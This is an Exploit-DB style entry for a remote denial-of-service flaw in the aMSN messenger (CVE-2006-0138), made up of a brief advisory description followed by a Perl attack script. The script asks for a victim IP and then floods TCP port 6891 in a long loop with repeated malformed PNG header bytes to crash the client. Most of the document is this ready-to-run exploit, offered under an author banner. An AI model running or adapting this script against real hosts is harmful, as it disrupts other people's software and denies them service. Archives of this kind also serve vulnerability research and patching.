aMSN Remote Denial of Service Vulnerability

2006-01-01T00:00:00
ID EDB-ID:37692
Type exploitdb
Reporter Braulio Miguel Suarez Urquijo
Modified 2006-01-01T00:00:00

Description

aMSN Remote Denial of Service Vulnerability. CVE-2006-0138. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/55381/info

aMSN is prone to a remote denial-of-service vulnerability.

A successful exploit of this issue allows remote attackers to crash the affected application, denying service to legitimate users. 

#!/usr/bin/perl
use IO::Socket;

$x = 0;
print q(
**************************************
* AMSN REMOTE DOS XPL *
* BY *
* Red-Point *
* red-point@odiameporserelite.org *
**************************************
);

print q(Victim IP: );
$hos = <STDIN>;
chop ($hos);

print q( );
$type = seC0de;
chop ($type);

if($type == seC0de){
 while($x != 9999999){

  $postit = "";
  $lrg = length $postit;
  my $sock = new IO::Socket::INET (
                                 PeerAddr => "$hos",
                                 PeerPort => "6891",
                                 Proto => "tcp",
                                );

  die "\nEl host esta fuera de servicio o no estas conectado a internet $!\n" unless $sock;

  print $sock "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D".
    "\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00".
    "\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44".
    "\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47".
    "\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00".
    "\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48".
    "\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E".
    "\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A".
    "\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49".
    "\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A".
    "\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D".
    "\x49\x48\x44\x52";
  close($sock);
  syswrite STDOUT, "|";
  $x++;
 }
}
else{
        die " \n";
}